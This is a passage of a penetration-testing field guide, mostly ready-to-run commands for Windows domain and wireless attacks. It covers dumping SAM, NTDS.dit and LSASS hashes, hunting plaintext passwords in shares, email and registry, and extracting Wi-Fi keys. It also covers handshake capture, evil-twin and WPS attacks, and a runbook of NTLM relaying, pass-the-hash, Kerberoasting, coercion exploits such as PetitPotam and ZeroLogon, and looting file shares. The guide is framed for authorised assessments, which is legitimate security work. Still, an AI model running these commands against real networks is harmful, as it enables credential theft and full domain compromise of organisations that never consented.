A UTOMATE L OCAL A DMIN T O D OMAIN A DMIN (N OISY )
Initiate Deathstar
https://github.com/EmpireProject/Empire

python empire --rest --username empireadmin --password Password123

https://github.com/byt3bl33d3r/DeathStar

DeathStar.py

Execute DeathStar

crackmapexec smb targets.txt -u username -p password –d domain -M empire_exec -o

LISTENER=DeathStar

Internal Security Assessment: Field Guide Page 37

CREDENTIAL PILLAGING

Internal Security Assessment: Field Guide Page 38

E XTRACT SAM & C ACHED H ASHES M ANUALLY

Manual Local SAM and Cached Credential Extraction (1)

reg save hklm\sam c:\SAM

reg save hklm\system c:\SYSTEM

reg save hklm\security c:\SECURITY

Reconstruct SAM and Cached Credentials into readable hashes (2)

impacket-secretsdump -sam /root/SAM -security /root/SECURITY -system /root/SYSTEM LOCAL

E XTRACT NTDS. DIT H ASHES M ANUALLY

Manual NTDS.dit Extraction using vssadmin (1)

vssadmin create shadow /for=C:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit c:\ntds.dit

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\SYSTEM
c:\SYSTEM

Manual NTDS.dit Extraction using ntdsutil (1)

ntdsutil "ac in ntds" i "cr fu c:\temp" q q

Reconstruct NTDS.dit into readable hashes (2)

impacket-secretsdump -ntds ./ntds.dit -system ./SYSTEM LOCAL -outputfile customer

E XTRACT NTDS. DIT H ASHES (A UTOMATED )

Dump NTDS.dit with Crackmapexec

crackmapexec smb <target> -u admin -p Password123 -d domain --ntds

Internal Security Assessment: Field Guide Page 39

E XTRACT U S ERS W ITHOUT P ASSWORD R EQUIREMENT
No Password Required

crackmapexec ldap example.local -u username -p password --kdcHost DC_IP_ADDR –password-not-

required

F IND P LAINTEXT P ASSWORDS

Automate searching for credentials through email

https://github.com/dafthack/MailSniper

#Searching with non-admin privs

Invoke-SelfSearch -Mailbox [email protected]

#Searching with admin privs

Invoke-GlobalMailSearch -ImpersonationAccount notanadmin -ExchHostname exchange

Automate search through SMB and NFS Shares

https://github.com/blacklanternsecurity/MANSPIDER

manspider 192.168.0.0/24 -f passw -d example.local -u bob -p Password

https://github.com/SpiderLabs/scavenger

python3 scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local

OR

python3 scavenger.py smb --target iplist --username administrator --password Password123 --domain
test.local --overwrite

https://github.com/byt3bl33d3r/CrackMapExec.git

crackmapexec smb 10.10.10.10 -u 'username' -p 'password' -M spider_plus

Extract session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP

Internal Security Assessment: Field Guide Page 40

https://github.com/Arvanaghi/SessionGopher

Import-Module path\to\SessionGopher.ps1; Invoke-SessionGopher -iL targets.txt -u domain.com\admin

-p Password123 –o

Search passwords in commonly-used software

https://github.com/AlessandroZ/LaZagne/releases

Drop laZagne.exe all on victim

Metasploit Post Exploitation

use post/windows/gather/*

Search passwords in files and registry

findstr /si password *.txt

findstr /si password *.xml

dir /s *pass* == *cred* == *vnc* == *.config*

findstr /spin "password" *.*

reg query HKLM /f password /t REG_SZ /s

reg query HKCU /f password /t REG_SZ /s

findstr /si password *.ini

dir /b /s sysprep.inf

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" (Windows

Autologin)

Crackmapexec

crackmapexec smb -t 150 <target> -u USER -p Password123 --spider Users --depth 10 --pattern
password

Internal Security Assessment: Field Guide Page 41

Extract passwords from PST File
Non-Password protected File
https://github.com/srnsw/xena/tree/master/xena/dist/winx86

readpst.exe –D –S –o output –t ea mail.pst

findstr /s /i /m “password” *.*

Password Protected PST File

https://github.com/righettod/pst-digger

java -jar pst-digger.jar -a -f "C:\Users\xxx\my.pst" -i -k "login|password" -o TEST01

Stored User Descriptions

#Sometimes there are passwords or keys stored in descriptions

crackmapexec ldap example.local -u username -p password --kdcHost DC_IP_ADDR -M get-desc-users

OR

ldapdomaindump -u SITTINGDUCK\\notanadmin -p QWERTY dc-ip

Stored Passwords in PowerShell History

cat (Get-PSReadlineOption).HistorySavePath

or

cat (Get-PSReadlineOption).HistorySavePath | sls password

or

cat (Get-PSReadlineOption).HistorySavePath | sls accountpassword

WPA PSK S TRING E XTRACTION

Windows

netsh wlan show profiles

Internal Security Assessment: Field Guide Page 42

netsh wlan show profile name=WIFI_NAME key=clear

Look for the “Key Content” line, the cleartext password will be there.

OR

crackmapexec smb <ip> -u user -p pass -M wireless

*NIX

sudo cat /etc/NetworkManager/system-connections/{SSID} | grep psk=

sudo grep psk= /etc/NetworkManager/system-connections/*

OR

sudo cat /etc/wicd/wireless-settings.conf

Internal Security Assessment: Field Guide Page 43

 WIRELESS

Internal Security Assessment: Field Guide Page 44

WPA/WPA2 H ASH C APTURE WITH U SERS
#Will work with a cheap Atheros wireless USB LAN adapter
Automate
https://github.com/derv82/wifite2
https://github.com/v1s1t0r1sh3r3/airgeddon

./Wifite.py

OR

./airgeddon.sh

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select Handshake tools menu (option 5)
4) Explore targets (option 4)
5) Capture Handshake (option 5)

Run manually

airmon-ng

airmon-ng start wlan0

airodump-ng wlan0mon or airodump-ng -b a wlan0mon

airodump-ng wlan0mon -c 3 -t wpa -d ff:ff:ff:ff:ff:ff -w capture

#*-c = channel *-d=BSSID

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 wlan0mon

#*-a=BSSID *-c=client

WPA/WPA2 H ASH C APTURE WITHOUT U SERS (PMKID)

#Will work with a cheap Atheros wireless USB LAN adapter
Automate via Wifite
https://github.com/derv82/wifite2

./Wifite.py

Internal Security Assessment: Field Guide Page 45

Run manually
https://github.com/ZerBea/hcxdumptool
https://github.com/ZerBea/hcxtools

airmon-ng

airmon-ng start wlan0

airodump-ng --ivs wlan0mon

echo "BSSID">filter.txt

hcxdumptool -o cap01.pcapng -i wlan0 --filterlist=filter.txt --filtermode=2 --enable_status=1 -c 1

hcxpcaptool -E essidlist -I identitylist -U usernamelist -z cap01.16800 cap01.pcapng

WPS
#Will work with a cheap Atheros wireless USB LAN adapter
Automate via airgeddon
https://github.com/v1s1t0r1sh3r3/airgeddon

./airgeddon.sh

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select WPS attack menu (option 8)
4) Explore targets (option 4)
5) Run through list (7-13)

E NTERPRISE W IRELESS
#Will work with a cheap Atheros wireless USB LAN adapter
Automate via airgeddon
https://github.com/v1s1t0r1sh3r3/airgeddon

./airgeddon.sh

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select Enterprise attack menu (option 10)

Internal Security Assessment: Field Guide Page 46

4) Create company specific certificate (option 5)
5) Select Smooth mode Enterprise Evil Twin (option 6)

Password Spray
https://github.com/s0lst1c3/eaphammer

./eaphammer --eap-spray –I wlan0 –e SSID_EXAMPLE --user-list users.txt –password Summer2019

Password Reuse

If certificates are not validated, use a compromised AD username and password.

E VIL T WIN ( SOCIAL E NGINEERING )

#Will work with a cheap Atheros wireless USB LAN adapter
Automate via airgeddon
https://github.com/v1s1t0r1sh3r3/airgeddon

./airgeddon.sh

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select Evil Twin menu (option 7)
4) Select option 7-9 based on OPSEC requirement

O PEN W IRELESS
Nmap internal IP addresses and or hostnames.

WEP W IRELESS
#Will work with a cheap Atheros wireless USB LAN adapter
Automate
https://github.com/derv82/wifite2
https://github.com/v1s1t0r1sh3r3/airgeddon

./Wifite.py

OR

Internal Security Assessment: Field Guide Page 47

./airgeddon.sh

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select Handshake tools menu (option 5)
4) Explore targets (option 4)
5) WEP attack (option 5)

Internal Security Assessment: Field Guide Page 48

METHODOLOGY

Internal Security Assessment: Field Guide Page 49

I NTERNAL R UN B OOK F OR M OST W INDOWS N ETWORKS (Q UICK
A CCESS )

Asset discovery is generally time consuming, slow and produce lots of network traffic. I often spend the
first 30 min of my time running responder and MITM6 in an attempt gain credentials. I then move into
authenticated asset discovery.
1) Look for a very quick wins with before anything else. If attacks fail, move onto #2.
crackmapexec smb <Domain Controller> -u '' -p '' -M petitpotam
crackmapexec smb <Domain Controller> -u '' -p '' -M zerologon
crackmapexec smb <Domain Controller> -u '' -p '' –users -o users.txt
a. cme ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt
a. ./hashcat.bin -m 118200 -O -w 3 ./output.txt /opt/rockyou.txt
b. wget http://weakpasswords.net -O weakpass.txt
c. cme smb <Domain Controller> -u '' -p '' --pass-pol
d. spray.sh -smb <targetIP> <usernameList> <passwordList>
<AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
crackmapexec smb <subnet> -u '' -p '' -M ms17-010

2) Gather hashes. Careful this can cause certificate issues, among other things and potentially
DoS users.
responder -I eth0 -Pdv
a. sort -u -t: -k1,1 /usr/share/responder/logs/*.txt

3) Legacy services may be disabled. mitm6 may produce more hashes. I like to use the IP range of
my local subnet. Careful this can cause certificate issues, among other things and potentially
DoS users.
crackmapexec smb <subnet> --gen-relay-list relaylistOutputFilename.txt
mitm6 -i eth0 -d example.local
ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relaylistOutputFilename.txt -smb2support
a. Check local directory for hashes and SAM dumps. If a SAM hash is obtained Pass The
Hash to other domain PCs.
crackmapexec smb <ip> -u admin -H blahblah -M hash_spider
crackmapexec smb <subnet> -u admin -H blahblah -lsa

Internal Security Assessment: Field Guide Page 50

 a) cat /root/.cme/logs/*.secrets |sort -u
crackmapexec smb <subnet> -u admin -H blahblah -M lsassy

4) Crack the hashes. Most of the time you will get NTLMv2 (5600) hashes on modern
environments. If the hashes don’t crack. Continue relaying (preferably off hours). SMB
Signing may be enabled.
./hashcat64.bin -m 5600 -O -w 3 /opt/customer/admin_hash.txt /opt/wordlist/all_wordlists.txt
./hashcat64.bin -m 5600 -O -w 3 /opt/customer/admin_hash.txt /opt/wordlist/rockyou.txt -r
/usr/share/hashcat/rules/dive.rule

#If passwords are cracked, start moving laterally.

5) Figure out roles of each account. We are looking for admins.
crackmapexec ldap example.local -u username -p password --admin-count
OR
ldapdomaindump -u SITTINGDUCK\\notanadmin -p QWERTY dc-ip
OR
pingcastle.exe --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> -
-password <PASSWORD>
OR
bloodhound-python -u <USERNAME> -p <PASSWORD> -c all
a. cat users.json|jq -r '.users[] | .Properties |select(.admincount==true) |.name'

6) Are the creds Admin?

a. Are the creds LOCAL Admin?
Automated
crackmapexec smb <ip> -u admin -H blahblah -M hash_spider
Manual
i. I like to make a quick list of hosts to target.
crackmapexec ldap <Domain Controller> -u admin -p password -M subnets
ii. Dump SAM file in an attempt to pass the hash.
crackmapexec smb AD_Computers.txt -u admin -p password -sam

Internal Security Assessment: Field Guide Page 51

 1) Once hash is obtained Pass The Hash to other domain PCs.
crackmapexec smb AD_Computers.txt -u admin -H blahblah -lsa
cat /root/.cme/logs/*.secrets |sort -u
iii. Dump LSASS in an attempt to escalate privileges.
crackmapexec smb AD_Computers.txt -u admin -p password -lsa
cp /root/.cme/logs/*.secrets |sort -u
iv. Dump LSASS in an attempt to escalate privileges. Note, this often returns more
creds but is not stored in the DB or in logs.
crackmapexec smb AD_Computers.txt -u admin -p password -M lsassy
b. Are the creds Domain Admin?
crackmapexec smb example.local -u UserNAme -p 'PASSWORDHERE' --ntds
crackmapexec smb example.local -u UserNAme -p 'PASSWORDHERE' --ntds vss

7) Are the creds a basic user?

a. Impersonate Domain Admin with noPAC
crackmapexec smb <Domain Controller> -u 'user' -p 'pass' -M nopac

b. Try the printer bug attack.

crackmapexec smb <Domain Controller> -u 'user' -p 'pass' -M spooler
a. python3 ntlmrelayx.py -t DCSYNC://dc1.example.local -smb2support
b. python3 printerbug.py -no-ping
example.local/username:[email protected] <ATTACKERIP>

c. Look for passwords in user descriptions.

crackmapexec ldap <Domain Controller> -u 'user' -p 'pass' -M user-desc
OR
crackmapexec ldap <Domain Controller> -u 'user' -p 'pass' -M get-desc-users
d. Make a list of users to password spray. Make sure password policy is followed.
ldapdomaindump -u SITTINGDUCK\\notanadmin -p QWERTY dc-ip
OR

Internal Security Assessment: Field Guide Page 52

 bloodhound-python -u <USERNAME> -p <PASSWORD> -c all
cat users.json|jq -r '.users[] | .Properties |.name' |cut -d @ -f1
i. Execute password spray
spray.sh -smb <targetIP> <usernameList> <passwordList>
<AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
OR
crackmapexec smb example.local -u users.txt -p Summer2022!
e. Look for privilege escalation attack vectors via AD.
pingcastle.exe --healthcheck --server <DOMAIN_CONTROLLER_IP> --user
<USERNAME>@example.local --password <PASSWORD>
#PingCastle will provide a lot of a results. These are the most common.
i. ASREPRoast
crackmapexec ldap <Domain Controller> -u users.txt -p '' --asreproast output.txt
crackmapexec ldap <Domain Controller> -u username -p pass --asreproast
output.txt
ii. Kerberoast
crackmapexec ldap <Domain Controller> -u username -p pass --kerberoasting
output.txt
iii. Find autologon information
crackmapexec smb <Domain Controller> -u username -p pass -M gpp_autologin
iv. Abuse AD CS
certipy 'example/john:[email protected]' auto
v. GPP Passwords.
crackmapexec smb <Domain Controller> -u username -p pass -M gpp_password

8) If you can’t crack the hashes, Pass the Hash from the SMB relay attack.
a. Basic users can create computer accounts. This can help gain a foothold into AD.
mitm6 -hw icorp-w10 -d internal.corp --ignore-nofqnd
ntlmrelayx.py -t ldaps://example.local --add-computer
b. Combine mitm6, ntlmrelayx and RBCD to abuse AD defaults.

Internal Security Assessment: Field Guide Page 53

 mitm6 -hw icorp-w10 -d internal.corp --ignore-nofqnd
ntlmrelayx.py -t ldaps://icorp-dc.internal.corp -wh attacker-wpad --delegate-access
getST.py -spn cifs/example.local example.local/NEW_PC_NAME\$ - impersonate admin
export KRB5CCNAME=admin.ccache
secretsdump.py -k -no-pass admin.ccache
c. Relay an SMB authentication request to the DC. If it’s a DA account and vuln to CVE-
2019-1019, it will make a new DA account.
mitm6 -hw icorp-w10 -d internal.corp --ignore-nofqnd
ntlmrelayx.py -t ldaps://example.local -smb2support --remove-mic

9) Find subnets user/servers are on.

bloodhound-python -u username -p Password123 -c all
cat computers.json|jq -r '.computers[] | .Properties |.name' > computers.txt
nmap -p445 -Pn -oG - -iL computers.txt | awk '/open/{print $2}' | cut -d '.' -f1,2,3 |sort -u |sed
's/$/.0\/24/'

10) Dump AD subnets.

crackmapexec ldap <Domain Controller> -u 'user' -p 'pass' -M subnets
OR
.\godditest-windows-amd64.exe -username=testuser -password="testpass!" -domain="test.local"
-dc="dc.test.local" -unsafe
OR
pingcastle.exe --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> -
-password <PASSWORD>
PingCastle.exe --hc-conso

11) Dump DNS records and find internal records to avoid going out of scope.
crackmapexec smb <Domain Controller> -u 'user' -p 'pass' -M enum_dns
OR
adidnsdump -u DOMAIN\\notanadmin <target>

Internal Security Assessment: Field Guide Page 54

 OR
ADCollector.exe --Domain domain.local --Username user --Password pass --Choice 1
12) Pillage files for sensitive data to show impact.
manspider 192.168.0.0/24 -f passw user admin account network login logon cred -d evilcorp -u
bob -p Passw0rd
OR
crackmapexec smb 10.10.10.10 -u 'user' -p 'pass' -M spider_plus
a. Dump all filenames to your local drive
crackmapexec smb 10.10.10.10 -u 'user' -p 'pass' -M spider_plus -o
READ_ONLY=false
b. Browse to the SMB share. Download for impact.
smbclient '//PC.example.local/C$' -U Administrator --pw-nt-hash blahblahblah -
W example.local
OR
#Prompt for password.
smbclient '//PC.example.local/C$' -U Administrator -W example.local
#ls - lists files
#cd - directories
#mget - download file(s)

13) Look for default creds on network equipment and applications.

cat subnets.txt | naabu -silent | httpx -silent -c 500 | nuclei -severity critical, high, medium
AND/OR
nmap --script http-default-accounts -iL subnets.txt
AND/OR
cat hosts.txt | httpx | ffuf -w - -u FUZZ -mr "assword"

14) Kick off vulnerability scanner to fill any gaps and exploit as needed.
#Need to find low hanging fruit quickly?
Run Nessus file through https://github.com/averagesecurityguy/scripts/blob/master/scan/scan.py

Internal Security Assessment: Field Guide Page 55

 a. Check for things that Nessus can’t that may be risks but didn’t need to exploit.
crackmapexec smb <Domain Controller> -u Administrator -p 'Password123!' -M
dfscoerce
crackmapexec smb <Domain Controller> -u 'user' -p 'pass' -M nopac
crackmapexec smb <Domain Controller> -u Administrator -p 'Password123!' -M
shadowcoerce
crackmapexec smb <Domain Controller> -u Administrator -p 'Password123!' -M
petitpotam
crackmapexec ldap <Domain Controller IP> -u Administrator -p 'Password123!' -M
ldap-checker --kdcHost example.local
crackmapexec ldap <Domain Controller> -u Administrator -p 'Password123!' -M ldap-
signing

15) Manually look at each application through a screenshot tool. Check for default creds. Google
vendor passwords if you have internet access.

a. Screenshot web applications

eyewitness -x file.nessus --active-scan --web

b. List web apps with a credential page

cat hosts.txt | httpx –threads 500 -ms "assword"

Internal Security Assessment: Field Guide Page 56

 Thank You for Your Contribution
• @Derek_Carlin
• @_dirkjan
• @byt3bl33d3r
• Rjohnsondev
• @netbiosX
• AlessandroZ
• @arvanaghi
• Nikallass
• @agsolino
• @PythonResponder
• @gentilkiwi
• @harmj0y
• @mysmartlogon
• Atom
• @xerosecurity
• @ztgrace
• Folks at SySS Research
• Contributors to Metasploit
• @bonsaiviking
• @ErrataRob
• x90skysn3k
• @DanHMcInerney
• @derv82
• @s0lst1c3
• @mpgn_x64
• @nixfreax

Internal Security Assessment: Field Guide Page 57